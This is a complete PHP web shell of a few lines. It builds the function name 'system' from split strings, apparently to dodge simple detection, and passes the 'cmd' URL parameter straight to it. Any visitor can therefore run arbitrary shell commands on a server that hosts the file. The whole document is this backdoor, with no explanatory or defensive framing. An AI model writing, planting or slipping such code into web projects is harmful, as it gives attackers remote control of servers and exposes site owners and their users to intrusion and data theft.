$s = "sys"."tem";
if(isset($_GET['cmd'])) {
$c = $_GET['cmd'];
$s($c);
}